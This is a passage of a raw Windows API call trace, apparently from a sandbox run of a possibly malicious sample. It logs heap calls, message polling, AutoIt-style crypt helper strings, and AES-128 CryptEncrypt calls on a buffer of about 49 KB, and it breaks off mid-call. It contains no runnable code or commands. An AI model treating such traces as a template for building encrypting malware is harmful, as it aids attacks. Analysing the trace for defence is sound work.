RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0192.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0192.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0192.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0192.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0192.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0192.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0192.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0192.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0192.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0192.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0192.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.259] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0192.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0192.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0192.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0192.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0192.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0192.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0192.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0192.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0192.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0192.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0192.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0192.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0192.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0192.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0192.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0192.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0192.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0192.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0192.260] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0192.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0192.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0192.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0192.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0192.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0192.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0192.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0192.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0192.261] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0192.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0192.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0192.261] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0192.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0192.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0192.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0192.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0192.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0192.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0192.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0192.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0192.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0192.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0192.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0192.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0192.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0192.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0192.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0192.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0192.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0192.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0192.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0192.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0192.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0192.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0192.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0192.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0192.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0192.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0192.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0192.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0192.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0192.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0192.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0192.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0192.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0192.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0192.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0192.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0192.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0192.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0192.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0192.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0192.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0192.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0192.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0192.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0192.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0192.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0192.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0192.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0192.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0192.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0192.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0192.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0192.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0192.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0192.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0192.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0192.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0192.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0192.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0192.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0192.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0192.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0192.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0192.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0192.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0192.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0192.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0192.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0192.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0192.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0192.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0192.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0192.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0192.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0192.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0192.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0192.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0192.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0192.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0192.266] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0192.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0192.266] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c26d8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26d8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0192.266] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.266] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.266] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.266] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.266] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.266] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0192.266] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.266] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.266] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0192.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0192.266] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.267] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0192.267] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0192.267] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0192.267] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.267] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0192.267] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.267] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0192.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0192.267] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.267] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.267] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.294] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0192.294] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.294] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0192.294] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.296] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.296] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xc1eb, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xc1f0) returned 1 [0192.296] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.296] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0192.296] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.296] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.296] CharLowerBuffW (in: lpsz="byte[49649]", cchLength=0xb | out: lpsz="byte[49649]") returned 0xb [0192.296] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.298] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.298] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.298] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.299] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.299] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0xc1eb, dwBufLen=0xc1f0 | out: pbData=0xa5f008*, 